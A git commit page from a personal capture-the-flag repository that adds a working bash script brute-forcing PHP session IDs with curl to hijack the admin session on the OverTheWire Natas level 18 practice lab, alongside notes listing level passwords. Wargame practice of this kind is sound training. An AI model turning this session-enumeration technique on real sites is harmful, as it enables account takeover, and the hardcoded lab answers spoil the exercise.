emileclarkb/ctfs
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

<Natas> scripts/natas18.sh(working)

Browse source
This commit is contained in:
Emile Clark-Boman 2025-07-16 00:21:18 +10:00
parent 42ecc035b5
commit 9cd4fbcbf5
2 changed files with 11 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

1
overthewire/natas/passwords.md
View file

@ -72,7 +72,6 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
Another oracle attack using an SQL injection AND this time Another oracle attack using an SQL injection AND this time
using a timing based attack. using a timing based attack.
NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
natas19: natas19:
natas20: natas20:

16
overthewire/natas/scripts/natas18.sh
View file

@ -6,7 +6,7 @@ USERNAME="admin"
PASSWORD="arbitrary" PASSWORD="arbitrary"
req() { req() {
local SESSION_ID=$1 SESSION_ID=$1
curl http://natas18.natas.labs.overthewire.org/index.php \ curl http://natas18.natas.labs.overthewire.org/index.php \
-X POST \ -X POST \
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \ -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
@ -14,13 +14,19 @@ req() {
-d "password=$PASSWORD" \ -d "password=$PASSWORD" \
--cookie "PHPSESSID=$SESSION_ID" \ --cookie "PHPSESSID=$SESSION_ID" \
-sS \ -sS \
| grep "regular user" &>/dev/null | grep "Password: "
} }
MIN_ID=0 MIN_ID=0
MAX_ID=640 MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
printf "Attempt: %2d" $i printf "Attempt: %2d" $i
req "$i" && echo -en '\r' || $(echo " [admin]"; break) OUT=$(req "$i")
if [ $? -ne 0 ]; then
echo -en '\r'
else
echo " [admin]"
echo $OUT | awk '{print substr($2,1,32)}'
break
fi
done done